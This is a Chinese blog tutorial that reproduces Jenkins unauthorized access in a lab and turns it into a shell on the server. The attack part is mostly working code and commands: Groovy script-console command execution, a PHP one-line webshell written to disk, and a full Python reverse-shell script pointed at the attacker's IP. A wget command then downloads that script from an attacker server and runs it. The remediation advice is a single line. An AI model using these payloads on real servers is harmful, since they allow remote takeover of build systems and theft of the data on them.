Jenkins未授权访问漏洞复现与 getshell 利用方法汇总

最新推荐文章于 2024-08-04 22:58:41 发布
最新推荐文章于 2024-08-04 22:58:41 发布
阅读量7.5k 收藏 12
点赞数 5
分类专栏: # 未授权访问 文章标签: jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/120369441
版权

一、Jenkins介绍

1.1 什么是Jenkins?

Jenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle。

1.2 Jenkins的功能

Jenkins是一个基于Java开发的开源项目,可在Tomcat等流行的servlet容器中运行,也可以独立运行,其功能如下:
用于持续性、自动的构建/测试软件
项目监控或跑一些定时任务
监控外部调用执行的工作

1.3 Jenkins的漏洞简介及危害

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

1.4 Jenkins的漏洞成因

1、使用低版本的Jenkins,默认没有登录控制
2、有登录控制,但配置文件中设置了不启用安全性(/var/lib/jenkins/config.xml 设置为false)
3、控制台使用了弱密码
4、Jenkins系统后台中可以执行系统脚本命令

二、靶场搭建

服务器: Centos 8
IP: 192.168.241.129

2.1 下载 Jenkins 并安装

地址:
官方:http://mirrors.jenkins.io
镜像:https://mirrors.tuna.tsinghua.edu.cn/jenkins/redhat/

wget https://mirrors.tuna.tsinghua.edu.cn/jenkins/redhat/jenkins-2.258-1.1.noarch.rpm

在这里插入图片描述
安装JAVA环境

yum install java-1.8.0-openjdk.x86_64  -y

在这里插入图片描述
安装 jenkins 并启动

rpm -ivh jenkins-2.258-1.1.noarch.rpm
service jenkins start

在这里插入图片描述

2.2 配置 Jenkins

浏览器访问 8080 端口,将密码复制粘贴过去
在这里插入图片描述
之后下一步:选择 安装推荐的插件
在这里插入图片描述
设置一个新的用户名、密码,我没设置,选择的“使用admin账户继续”
在这里插入图片描述
成功登录进去
在这里插入图片描述

2.3 配置 Jenkins 不用账号密码即可登录

但是再次访问 http://192.168.241.129:8080/ 需要admin的账户密码,有点繁琐,为了方便,设置 Jenkins 不使用账号密码即可登录

vi  /var/lib/jenkins/config.xml

在这里插入图片描述
重启 Jenkins

systemctl restart jenkins

在这里插入图片描述
再次访问 http://192.168.241.129:8080/ 不需要账号密码即可进管理后台
在这里插入图片描述
注意:
防火墙配置需要关闭防火墙或者开通8080端口,其它主机才可以访问服务器的8080端口

systemctl stop firewalld.service

三、漏洞复现

3.1 发现漏洞

访问目标网站存在 Jenkins 未授权访问漏洞
在这里插入图片描述

3.2 漏洞利用

点击 系统管理
在这里插入图片描述
之后,下拉找到脚本控制台,点击脚本控制台
在这里插入图片描述
执行并打印系统命令

println "whoami".execute().text
println "ifconfig".execute().text

在这里插入图片描述

如果知道web站点目录可写入一句话shell,例如:

new File("D:\\phpstudy_pro\\WWW\\php_shell.php").write('<?php @eval($_POST[cmd]);?>');

本案例,无WEB站点,那么通过脚本反弹shell,看看行不行
在这里插入图片描述
但是发现 kali 监听端并没有反弹shell
在这里插入图片描述
换一个思路先上传python脚本,然后利用python脚本生成一个bash反弹shell
ft.py 脚本内容:

#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.241.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

将 ft.py 脚本放在本地WEB服务器上,之后在 jenkins 上执行命令,去WEB服务器上下载 ft.py 到 /tmp/目录下

println "wget http://192.168.241.1/ft.py -P /tmp/".execute().text

在这里插入图片描述
执行python脚本 ft.py

println "python3 /tmp/ft.py".execute().text

在这里插入图片描述
kali 成功接收到反弹的 shell
在这里插入图片描述

四、修复建议

1、配置Jenkins登录验证

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

W小哥1
关注
专栏目录
jenkins漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-13 1570
jenkins漏洞概述,Jenkins是一个开源软件项目,它是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 3月9日,启明星辰VSRC监测到Jenkins官方发布安全公告,修复了Jenkins Server和Update Center中发现的2个跨站脚本漏洞(CVE-2023-27898和CVE-2023-27905,统称为“CorePlague”)。经身份验证的威胁者可利用这些漏洞在受害者的 Jenkins Server上执
漏洞挖掘】——93、Jenkis授权访问
Fly_鹏程万里
06-17 131
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 589
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用利用链。其中最严重的就是绕过Groovy沙盒导致授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
Jenkins授权访问漏洞
最新发布
qq_68186313的博客
08-04 366
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令。一、使用以下fofa语法进行产品搜索。Jenkins授权访问漏洞
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1329
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
jenkins授权访问漏洞复现
zhangpeng999123的博客
08-25 905
1安装jenkins wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz #安装jdk tar zxvf jdk-8u45-linux-x64.ta.
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4667
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
04-12 553
【代码】漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
jenkins授权rce windows主机getshell
m0_46689007的博客
12-11 1399
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
XXL-JOB executor 授权访问漏洞复现
m0_53603468的博客
12-25 2902
概述 XXL-JOB executor 授权访问漏洞 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,授权的攻击者可以通过RESTful API执行任意命令。 不过XXL-JOB官方版本原生自带了鉴权组件,开启后可保障系统底层通讯安全。因此,正常情况下调度中心与执行器底层通讯是安全
jenkins授权访问漏洞记录(端口:7001,80,8080,50000)
墨痕诉清风的博客
11-12 1996
一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 docker pull docker.io/jenkins 开启服务(我执行的第一条命令即可) How to use this image docker run -p 8080:8080 -p 50000:50000 jenkins This will store the workspace
Jenkins授权访问
weixin_43622525的博客
03-04 2799
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流。默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。 Jenkins授权访问 部署Jenkins 1.62版本,将全局授权策略打开,目前新版本的Jenkins已默认需要用户登录,但老版的中默认配置是“任意用...
Jenkins漏洞(CVE-2017-1000353)复现
qq_62056583的博客
07-05 674
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。网上查找相关资料显示,漏洞经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。查看tmp目录下是否成功生成,但我的虚拟机中并没有生成相应的数据包,或者说是我的Java环境出的问题(该项实验目前还没成功实现)对生成的字节码文件进行发送,使用预备知识第二条指令。
dpkg命令_Jenkins授权访问-命令执行漏洞复现及修复方案
weixin_39775577的博客
11-24 211
注:以下内容仅供技术交流,严禁用于非法活动一、背景Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。漏洞原因:jenkins 设置帐号密码,或者使用了弱帐号密码二、环境搭建测试环境:靶机:Ubuntu16.04 IP: ...
jenkins漏洞复现
Shanfenglan's blog
11-30 1585
文章目录什么是jenkinsJenkins远程命令执行漏洞(CVE-2018-1000861)参考文章 什么是jenkins 实现了CI/CD的产品。jenkins会从git或者svn上拉代码然后在配置所指向的环境中进行编译并上线。 Jenkins的思想就是自动化部署,“自动化”的具体体现在:当我们向版本库(SVN)提交新的代码后,应用服务器(Tomcat)就会自动从我们的SVN上拉去新的war包,然后重新部署,用户或测试人员看到的就是最新的应用程序。 Jenkins远程命令执行漏洞(CVE-2018-10
漏洞复现-Jenkins
aming小老弟
10-03 569
渗透
漏洞复现Jenkins CLI 接口任意文件读取漏洞(CVE-2024-23897)
网络安全从业者的学习笔记
07-26 655
Jenkins是一款基于JAVA开发的开源自动化服务器。 Jenkins使用`args4j`来解析命令行输入,并支持通过HTTP、WebSocket等协议远程传入命令行参数。在`args4j`中,用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。
Jenkins RCE 漏洞复现(CVE-2017-1000353、CVE-2018-1000861)
oiadkt的博客
09-21 2002
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
jenkins shell
03-16
Jenkins ShellJenkins插件中的一种,它允许用户在Jenkins构建过程中使用Shell脚本来执行一些操作,比如编译代码、运行测试、部署应用等。通过Jenkins Shell插件,用户可以方便地在Jenkins中集成Shell脚本,从而实现自动化构建和部署。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值